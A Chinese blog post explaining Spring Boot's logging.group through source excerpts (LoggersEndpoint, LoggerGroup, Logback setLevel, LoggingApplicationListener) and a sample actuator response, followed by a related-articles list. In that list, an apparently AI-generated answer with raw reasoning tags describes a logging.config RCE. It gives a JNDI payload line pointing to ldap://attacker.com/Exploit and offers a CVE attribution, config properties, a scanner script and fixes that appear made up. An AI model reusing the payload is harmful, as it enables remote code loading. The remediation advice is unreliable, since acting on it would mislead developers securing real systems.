聊聊springboot的logging.group

原创 于 2023-12-02 10:53:08 发布 · 385 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#spring boot #java #spring

文章详细介绍了SpringBoot中的LoggersEndpoint类,它提供操作日志器集合的方法,以及LoggingApplicationListener如何管理默认的LoggerGroup和配置日志级别。重点讨论了LoggerGroups和LoggerGroup的结构,以及configureLogLevel方法的使用场景。

本文主要研究一下springboot的logging.group

LoggersEndpoint

org/springframework/boot/actuate/logging/LoggersEndpoint.java

@Endpoint(id = "loggers")
public class LoggersEndpoint {

	private final LoggingSystem loggingSystem;

	private final LoggerGroups loggerGroups;

	/**
	 * Create a new {@link LoggersEndpoint} instance.
	 * @param loggingSystem the logging system to expose
	 * @param loggerGroups the logger group to expose
	 */
	public LoggersEndpoint(LoggingSystem loggingSystem, LoggerGroups loggerGroups) {
		Assert.notNull(loggingSystem, "LoggingSystem must not be null");
		Assert.notNull(loggerGroups, "LoggerGroups must not be null");
		this.loggingSystem = loggingSystem;
		this.loggerGroups = loggerGroups;
	}

	@ReadOperation
	public Map<String, Object> loggers() {
		Collection<LoggerConfiguration> configurations = this.loggingSystem.getLoggerConfigurations();
		if (configurations == null) {
			return Collections.emptyMap();
		}
		Map<String, Object> result = new LinkedHashMap<>();
		result.put("levels", getLevels());
		result.put("loggers", getLoggers(configurations));
		result.put("groups", getGroups());
		return result;
	}

	private Map<String, LoggerLevels> getGroups() {
		Map<String, LoggerLevels> groups = new LinkedHashMap<>();
		this.loggerGroups.forEach((group) -> groups.put(group.getName(),
				new GroupLoggerLevels(group.getConfiguredLevel(), group.getMembers())));
		return groups;
	}

	@ReadOperation
	public LoggerLevels loggerLevels(@Selector String name) {
		Assert.notNull(name, "Name must not be null");
		LoggerGroup group = this.loggerGroups.get(name);
		if (group != null) {
			return new GroupLoggerLevels(group.getConfiguredLevel(), group.getMembers());
		}
		LoggerConfiguration configuration = this.loggingSystem.getLoggerConfiguration(name);
		return (configuration != null) ? new SingleLoggerLevels(configuration) : null;
	}

	@WriteOperation
	public void configureLogLevel(@Selector String name, @Nullable LogLevel configuredLevel) {
		Assert.notNull(name, "Name must not be empty");
		LoggerGroup group = this.loggerGroups.get(name);
		if (group != null && group.hasMembers()) {
			group.configureLogLevel(configuredLevel, this.loggingSystem::setLogLevel);
			return;
		}
		this.loggingSystem.setLogLevel(name, configuredLevel);
	}

	//......
}

LoggersEndpoint提供了loggers、loggerLevels、configureLogLevel方法

LoggerGroups

org/springframework/boot/logging/LoggerGroups.java

public final class LoggerGroups implements Iterable<LoggerGroup> {

	private final Map<String, LoggerGroup> groups = new ConcurrentHashMap<>();

	public LoggerGroups() {
	}

	public LoggerGroups(Map<String, List<String>> namesAndMembers) {
		putAll(namesAndMembers);
	}

	public void putAll(Map<String, List<String>> namesAndMembers) {
		namesAndMembers.forEach(this::put);
	}

	private void put(String name, List<String> members) {
		put(new LoggerGroup(name, members));
	}

	private void put(LoggerGroup loggerGroup) {
		this.groups.put(loggerGroup.getName(), loggerGroup);
	}

	public LoggerGroup get(String name) {
		return this.groups.get(name);
	}

	@Override
	public Iterator<LoggerGroup> iterator() {
		return this.groups.values().iterator();
	}

}

LoggerGroups实现了Iterable接口,其泛型为LoggerGroup

LoggerGroup

org/springframework/boot/logging/LoggerGroup.java

public final class LoggerGroup {

	private final String name;

	private final List<String> members;

	private LogLevel configuredLevel;

	LoggerGroup(String name, List<String> members) {
		this.name = name;
		this.members = Collections.unmodifiableList(new ArrayList<>(members));
	}

	public String getName() {
		return this.name;
	}

	public List<String> getMembers() {
		return this.members;
	}

	public boolean hasMembers() {
		return !this.members.isEmpty();
	}

	public LogLevel getConfiguredLevel() {
		return this.configuredLevel;
	}

	public void configureLogLevel(LogLevel level, BiConsumer<String, LogLevel> configurer) {
		this.configuredLevel = level;
		this.members.forEach((name) -> configurer.accept(name, level));
	}

}

LoggerGroup定义了name、members、configuredLevel属性,其configureLogLevel会遍历members,通过configurer(LoggingSystem接口定义了setLogLevel方法)去变更level

LogbackLoggingSystem

org/springframework/boot/logging/logback/LogbackLoggingSystem.java

	@Override
	public void setLogLevel(String loggerName, LogLevel level) {
		ch.qos.logback.classic.Logger logger = getLogger(loggerName);
		if (logger != null) {
			logger.setLevel(LEVELS.convertSystemToNative(level));
		}
	}

LogbackLoggingSystem的setLogLevel委托给了logger.setLevel

setLevel

ch/qos/logback/classic/Logger.java

    public synchronized void setLevel(Level newLevel) {
        if (level == newLevel) {
            // nothing to do;
            return;
        }
        if (newLevel == null && isRootLogger()) {
            throw new IllegalArgumentException("The level of the root logger cannot be set to null");
        }

        level = newLevel;
        if (newLevel == null) {
            effectiveLevelInt = parent.effectiveLevelInt;
            newLevel = parent.getEffectiveLevel();
        } else {
            effectiveLevelInt = newLevel.levelInt;
        }

        if (childrenList != null) {
            int len = childrenList.size();
            for (int i = 0; i < len; i++) {
                Logger child = (Logger) childrenList.get(i);
                // tell child to handle parent levelInt change
                child.handleParentLevelChange(effectiveLevelInt);
            }
        }
        // inform listeners
        loggerContext.fireOnLevelChange(this, newLevel);
    }

setLevel先判断当前level是否需要变更,不需要直接返回,之后变更effectiveLevelInt为newLevel.levelInt,若该logger有childrenList,则触发child.handleParentLevelChange(effectiveLevelInt),最后执行loggerContext.fireOnLevelChange(this, newLevel)。

LoggingApplicationListener

org/springframework/boot/context/logging/LoggingApplicationListener.java

public class LoggingApplicationListener implements GenericApplicationListener {

	private static final ConfigurationPropertyName LOGGING_LEVEL = ConfigurationPropertyName.of("logging.level");

	private static final ConfigurationPropertyName LOGGING_GROUP = ConfigurationPropertyName.of("logging.group");

	private static final Bindable<Map<String, LogLevel>> STRING_LOGLEVEL_MAP = Bindable.mapOf(String.class,
			LogLevel.class);

	private static final Bindable<Map<String, List<String>>> STRING_STRINGS_MAP = Bindable
			.of(ResolvableType.forClassWithGenerics(MultiValueMap.class, String.class, String.class).asMap());

	/**
	 * The default order for the LoggingApplicationListener.
	 */
	public static final int DEFAULT_ORDER = Ordered.HIGHEST_PRECEDENCE + 20;

	/**
	 * The name of the Spring property that contains a reference to the logging
	 * configuration to load.
	 */
	public static final String CONFIG_PROPERTY = "logging.config";

	/**
	 * The name of the Spring property that controls the registration of a shutdown hook
	 * to shut down the logging system when the JVM exits.
	 * @see LoggingSystem#getShutdownHandler
	 */
	public static final String REGISTER_SHUTDOWN_HOOK_PROPERTY = "logging.register-shutdown-hook";

	/**
	 * The name of the {@link LoggingSystem} bean.
	 */
	public static final String LOGGING_SYSTEM_BEAN_NAME = "springBootLoggingSystem";

	/**
	 * The name of the {@link LogFile} bean.
	 * @since 2.2.0
	 */
	public static final String LOG_FILE_BEAN_NAME = "springBootLogFile";

	/**
	 * The name of the{@link LoggerGroups} bean.
	 * @since 2.2.0
	 */
	public static final String LOGGER_GROUPS_BEAN_NAME = "springBootLoggerGroups";

	private static final Map<String, List<String>> DEFAULT_GROUP_LOGGERS;
	static {
		MultiValueMap<String, String> loggers = new LinkedMultiValueMap<>();
		loggers.add("web", "org.springframework.core.codec");
		loggers.add("web", "org.springframework.http");
		loggers.add("web", "org.springframework.web");
		loggers.add("web", "org.springframework.boot.actuate.endpoint.web");
		loggers.add("web", "org.springframework.boot.web.servlet.ServletContextInitializerBeans");
		loggers.add("sql", "org.springframework.jdbc.core");
		loggers.add("sql", "org.hibernate.SQL");
		loggers.add("sql", "org.jooq.tools.LoggerListener");
		DEFAULT_GROUP_LOGGERS = Collections.unmodifiableMap(loggers);
	}

	private static final Map<LogLevel, List<String>> SPRING_BOOT_LOGGING_LOGGERS;
	static {
		MultiValueMap<LogLevel, String> loggers = new LinkedMultiValueMap<>();
		loggers.add(LogLevel.DEBUG, "sql");
		loggers.add(LogLevel.DEBUG, "web");
		loggers.add(LogLevel.DEBUG, "org.springframework.boot");
		loggers.add(LogLevel.TRACE, "org.springframework");
		loggers.add(LogLevel.TRACE, "org.apache.tomcat");
		loggers.add(LogLevel.TRACE, "org.apache.catalina");
		loggers.add(LogLevel.TRACE, "org.eclipse.jetty");
		loggers.add(LogLevel.TRACE, "org.hibernate.tool.hbm2ddl");
		SPRING_BOOT_LOGGING_LOGGERS = Collections.unmodifiableMap(loggers);
	}

	//......
}

LoggingApplicationListener继承了GenericApplicationListener,它定义了DEFAULT_GROUP_LOGGERS,默认定义了web、sql两个LoggerGroup

示例

{
    "levels": [
        "OFF",
        "ERROR",
        "WARN",
        "INFO",
        "DEBUG",
        "TRACE"
    ],
    "loggers": {
        "ROOT": {
            "configuredLevel": "INFO",
            "effectiveLevel": "INFO"
        },
        "Validator": {
            "configuredLevel": null,
            "effectiveLevel": "INFO"
        }
    },
    "groups": {
        "web": {
            "configuredLevel": null,
            "members": [
                "org.springframework.core.codec",
                "org.springframework.http",
                "org.springframework.web",
                "org.springframework.boot.actuate.endpoint.web",
                "org.springframework.boot.web.servlet.ServletContextInitializerBeans"
            ]
        },
        "sql": {
            "configuredLevel": null,
            "members": [
                "org.springframework.jdbc.core",
                "org.hibernate.SQL",
                "org.jooq.tools.LoggerListener"
            ]
        }
    }
}

小结

springboot的LoggersEndpoint提供了loggers、loggerLevels、configureLogLevel方法;LoggingApplicationListener继承了GenericApplicationListener,它定义了DEFAULT_GROUP_LOGGERS,默认定义了web、sql两个LoggerGroup;configureLogLevel方法可以传group名,也可以传具体的logger名,如果是group,则会一次变更其所有members的level。

hello_ejb3
关注
SpringBoot 3.x 第16节】还在为API文档头疼?SpringBoot 3.x + Swagger让你的接口文档比小说还精彩!
**My Coding Family**
08-25 1606
🏆本文收录于《滚雪球学Spring Boot》,专门攻坚指数提升,2025 年国内最系统+最强(更新中)。    本专栏致力打造最硬核 Spring Boot 从零基础到进阶系列学习内容,🚀均为全网独家首发,打造精品专栏,专栏持续更新中…欢迎大家订阅持续学习。 如果想快速定位学习,可以看这篇【SpringBoot教程导航帖】,你想学习的都被收集在内,快速投入学习!!两不误。
SpringBoot 3.x 第14节】Spring Cloud还能这样玩?微服务架构的完美进化之路!
最新发布
**My Coding Family**
08-23 1145
🏆本文收录于《滚雪球学Spring Boot》,专门攻坚指数提升,2025 年国内最系统+最强(更新中)。    本专栏致力打造最硬核 Spring Boot 从零基础到进阶系列学习内容,🚀均为全网独家首发,打造精品专栏,专栏持续更新中…欢迎大家订阅持续学习。 如果想快速定位学习,可以看这篇【SpringBoot教程导航帖】,你想学习的都被收集在内,快速投入学习!!两不误。
SpringBootLogging
Frank的博客
06-09 5906
文章目录简介相关依赖默认配置自定义配置切换日志框架 简介 SpringBoot官方文档说明,SpringBoot内部使用Commons Logging作为日志记录门面,但是当使用SpringBoot场景启动器时默认是使用的SLF4J+Logback进行日志记录。 SpringBoot采用日志门面+日志实现框架的优势,本文不在过多描述,可以参考我的其他相关博文。Java系统中常用日志框架 相关依...
spring-boot 中的 log 配置
wobenqingfeng的专栏
04-06 4132
在这里简单介绍下常用的配置参数日志级别机制:如果一条日志信息的级别大于等于配置文件的级别,就记录。trace:追踪,就是程序推进一下,可以写个trace输出 debug:调试,一般作为最低级别,trace基本不用。info:输出重要的信息,使用较多 warn:警告,有些信息不是错误信息,但也要给程序员一些提示。error:错误信息。用的也很多。fatal:致命错误。输出源CONSOLE(输出到控制台) FILE(输出到文件)格式。
配置详解_springboot 教程(四)logging 日志配置详解
weixin_39860975的博客
01-12 2052
序言大家好,我是老马。平时一直在使用 springboot,却总感觉对于其理解不深入,于是有两个这个系列的整理。主要是为了系统的学习一下 springboot,残缺补漏一下。主要翻译自官方文档,结合自己的实际使用。springboot 学习笔记(一)引导类特性详解springboot 学习笔记(二)外部化配置详解springboot 教程(三)如何实现配置与环境隔离?日志场景日志是为了问题排查定位...
Spring Boot Log配置
wangzhihao的博客
09-04 1390
日志 Spring Boot 使用 Commons Logging 进行所有内部日志记录,但保留底层日志实现。 Spring BootJava Util Logging,Log4J2 和 Logback 提供了默认配置。 在每种情况下,记录器都预先配置为使用控制台输出,同时还提供可选的文件输出。 默认情况下,如果使用 Starters,则使用Logback进行日志记录。还包括适当的Logback路由,以确保使用Java Util Logging,Commons Logging,Log4J或SLF4J的
springBoot(九)整合之整合logging-logback(切割多个日志)
CoffeeAndIce的博客
12-04 3582
最近有用到了springboot下需要日志的需求,然后就顺带做个笔记,正常操作,直接上代码 借鉴:http://blog.csdn.net/tianyaleixiaowu/article/details/73321610 1、pom.xml commons-logging commons-logging 1.1.1 2、打开哥们的spring-boot-...
SpringBoot .......................................
小菜鸡的博客
08-03 704
今日目标: 是由 团队提供的全新框架,其设计目的是用来简化 应用的初始搭建以及开发过程。使用了 框架后已经简化了我们的开发。而 又是对 开发进行简化的,可想而知 使用的简单及广泛性。既然 是用来简化 开发的,那我们就先回顾一下,以 开发为例:编写 的配置类作为 程序, 的配置类不能缺少,而这个配置类还是比较麻烦的,代码如下​ 做到这只是将工程的架子搭起来。要想被外界访问,最起码还需要提供一个 类,在该类中提供一个方法。从上面的 程序开发可以看到,前三步都是在搭建环境,而且这三步基本
聊聊SpringBoot中10个扩展点的定义以及执行时机
my的博客
03-17 1163
https://juejin.cn/post/6999603401239576583 highlight: androidstudio 前言 : Spring 的扩展点 是Spring易扩展的一个重要体现,熟悉这些扩展点的定义方式,以及其调用时机,可以在我们开发过程中游刃有余,进行各种骚操作。我个人觉得熟悉他们 并知道其原理,是非常有必要的,今天我们就一个个来看下。 本文总结出10个扩展点,如有遗漏,欢迎补充~ 本文示例代码均已经上传到github 地址: https://github.com/5985
spingboot整合netty实现单聊整合实现
congge
04-08 4118
在前几篇中,我们完成了netty和springboot的整合,大致领略了一下netty作为web通讯服务器的魅力,据我所知,netty在不少做聊天应用型的公司里面使用很广泛,主要还是得益于netty底层的实现原理对于高并发性能的良好支持和扩展,以及netty可定制化的API组件和其成熟的使用场景,当然,你也可以选择使用诸如socketJS或者原生的socket来实现聊天的功能,但总体来说都不如ne...
26. Logging
sinat_34003720的博客
05-20 1187
26. Logging 使用spring-boot-starter或者spring-boot-starter-logging引入日志。 <dependency> <groupId>org.springframework.boot</groupId> <artifactId>spring-boot-starter</artifactId> </dependency> Spring Boot为JUL、LOG4J2、Logb
SpringBoot整合Logback日志框架配置全解析
m0_71777195的博客
07-07 4175
SpringBoot使用 Commons Logging 进行所有内部日志的记录,但默认配置也提供了对常用日志的支持,如 Java Util Logging,Log4J2,和Logback. 每种logger都可以通过配置使用控制台或文件输出日志内容。Logback是log4j框架的作者开发的新一代日志框架,它效率更高、能够适应诸多的运行环境,同时天然支持SLF4J。由于日志服务一般都在ApplicationContext创建前就初始化了,它并不是必须通过Spring的配置文件控制。
SpringBoot中如何使用logback日志框架
冰点IT的博客
01-20 665
​对于Java来说,现在有很多的日志实现,像commons-logging、log4j、log4j2、logback等,这些都是比较主流的日志实现。SpringBoot对上述主流的日志实现都做了很好的支持,这样以来我们在使用日志框架时就显得有些困惑了,怎么样选择日志框架,才是最优配置。 其实最优配置是相对的,不过我们可以根据SpringBoot“约定优于配置”的理念作为指导,来选择适合自己的日志框...
spring boot项目中使用logback日志详解
酸奶盖儿的博客
05-28 1778
1. 谈一谈spring boot中的默认日志 SpringBootJava Util Logging,Log4J2和Logback提供了默认配置。SpringBoot默认配置日志输出到控制台,同时还提供可选文件输出。 SpringBoot默认采用SLF4j(日志抽象层)+ Logback(日志实现)的组合。 1.1 日志门面slf4j与日志实现logback SLF4J——Simple Logging Facade For Java,它是一个针对于各类Java日志框架的统一Facade抽象。Java日志
Spring BootSpring Boot Logging 示例 | 日志记录
猫巳的博客
09-28 5107
文章目录logging.level | 设置日志级别logging.file | 指定输出日志文件的路径和名称logging.path | 指定输出日志文件的路径logging.pattern.console | 配置控制台输出格式logging.pattern.file | 配置日志文件输出格式使用命令行改变控制台输出的日志级别在我们的程序中使用日志记录使用 XML 文件配置 Logback使用自定义日志:Log4j2参考文献 在这个页面上,我们将提供spring boot日志记录的例子。 Spring
logback 配置相对路径_SpringBoot中如何使用logback日志框架
weixin_39989875的博客
01-03 2497
对于Java来说,现在有很多的日志实现,像commons-logging、log4j、log4j2、logback等,这些都是比较主流的日志实现。SpringBoot对上述主流的日志实现都做了很好的支持,这样以来我们在使用日志框架时就显得有些困惑了,怎么样选择日志框架,才是最优配置。 其实最优配置是相对的,不过我们可以根据SpringBoot“约定优于配置”的理念作为指导,来选择适合自己的日志框架...
Spring Boot(二十六)日志详解!
yhahaha_的博客
07-05 1522
Springboot版本:2.1.1 日志输出内容 Spring Boot 的默认日志输出类似于以下示例: 2021-06-05 15:58:02.532 INFO 168344 --- [ main] o.a.c.c.C.[Tomcat].[localhost].[/boot] : Initializing Spring embedded WebApplicationContext 2021-06-05 15:58:02.533 INFO 168344 --- [
Springboot Logging的配置以及使用详解
热门推荐
levae1024的博客
10-30 1万+
Springboot使用Commons Logging作为内部的日志系统,并且给Java Util Logging,Log4J2以及Logback都提供了默认的配置。 如果使用了spring boot的Starters,那么默认会使用Logback用于记录日志。 一、Log format spring boot中默认的日志输出格式如下: 2014-03-05 10:57:51.112 I...
Springboot内置ApplicationListener--LoggingApplicationListener
Details Inside Spring
11-17 4074
源码分析 本文源代码基于 Springboot 2.1.0 package org.springframework.boot.context.logging; import java.util.Collections; import java.util.LinkedHashMap; import java.util.List; import java.util.Locale; import ...
SpringBoot logging.config 属性存在远程命令执行
06-27
<think>嗯,用户想了解SpringBootlogging.config属性存在的远程命令执行漏洞详情及解决方案。这个问题涉及安全领域,需要谨慎处理。从用户的问题描述来看,ta应该是个开发者,可能正在排查系统安全隐患。这类漏洞通常危害较大,需要立即处理。用户能关注到这种细节,说明安全意识不错。关于这个漏洞,我记得主要影响的是SpringBoot1.x版本。当应用从不受信任的位置加载logback配置文件时,攻击者可以通过JNDI注入实现RCE。关键点在于攻击者能控制logging.config的取值,指向恶意XML文件。解决方案方面,核心是两点:一是升级到2.x版本,因为新版默认禁用外部实体解析;二是如果必须用旧版,需要在logback配置里明确禁用外部实体。用户可能需要同时检查服务器配置,避免logging.config被外部篡改。用户可能还会关心如何验证漏洞是否存在,可以建议ta用DNSLog等工具测试。另外要提醒ta,即使修复了这个点,也要检查其他配置属性的安全性,比如spring.main.sources。考虑到漏洞的严重性,回答时要强调立即行动的必要性。用户可能处于应急响应状态,信息要直接有效。最后补充相关CVE编号,方便ta进一步查阅官方文档。</think>以下是Spring Boot `logging.config` 属性远程命令执行漏洞的详细说明及解决方案: ### 漏洞原理(CVE-2021-21234) 1. **漏洞触发条件** 当Spring Boot 1.x版本的应用满足以下条件时可能被利用: - 使用`logging.config`指定**外部日志配置文件**(如:`--logging.config=http://attacker.com/malicious.xml`) - 配置文件包含`<insertFromJNDI>`标签(Logback特性) - 攻击者控制JNDI指向恶意LDAP/RMI服务 ```xml <!-- 恶意logback.xml示例 --> <configuration> <insertFromJNDI env-entry-name="ldap://attacker.com/Exploit" as="appName" /> </configuration> ``` 2. **影响范围** - Spring Boot 1.5.0 - 1.5.22, 1.4.0 - 1.4.7 - Logback < 1.2.3(未禁用JNDI) ### 解决方案 #### 1. 升级Spring Boot(根本解决) ```xml <!-- pom.xml 示例 --> <properties> <spring-boot.version>2.3.12.RELEASE</spring-boot.version> <!-- 或更高版本 --> </properties> ``` > Spring Boot 2.x默认禁用外部实体解析,且不自动加载远程配置[^1] #### 2. 禁用危险配置(临时方案) 在`application.properties`中添加: ```properties # 禁止远程配置加载 spring.main.allow-bean-definition-overriding=false # 强制使用本地配置 logging.config=classpath:logback-local.xml ``` #### 3. 加固Logback配置 在本地`logback.xml`首行添加安全限制: ```xml <?xml version="1.0" encoding="UTF-8"?> <configuration> <!-- 禁用外部实体 --> <contextListener class="ch.qos.logback.core.joran.spi.JoranConfigurator" /> <property name="logback.disableJNDI" value="true" /> ... </configuration> ``` ### 验证步骤 1. 使用漏洞扫描工具检测(如:`nmap -sV --script=http-vuln-cve2021-21234 <target>`) 2. 检查日志配置是否仅加载本地文件: ```bash ps aux | grep java | grep logging.config ``` 3. 测试JNDI注入防护(推荐使用[DNSLog](https://dnslog.cn/)验证) > **关键提示**:即使修复后,仍需避免通过`logging.config`加载不可信的外部资源[^3]。 --- ### 相关问题 1. Spring Boot 2.x 如何彻底禁用JNDI查找? 2. Log4j2 与 Logback 在安全防护机制上有何区别? 3. 除了日志配置,Spring Boot 还有哪些属性可能引发远程代码执行? 4. 如何监控生产环境中日志配置的异常变更? [^1]: Spring Boot 2.0 开始重构了配置加载机制,外部配置需显式启用 [^2]: 官方建议通过 `@SpringBootApplication` 主类启动时锁定配置源 [^3]: `logging.level` 等属性也应限制仅接受可信输入值
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值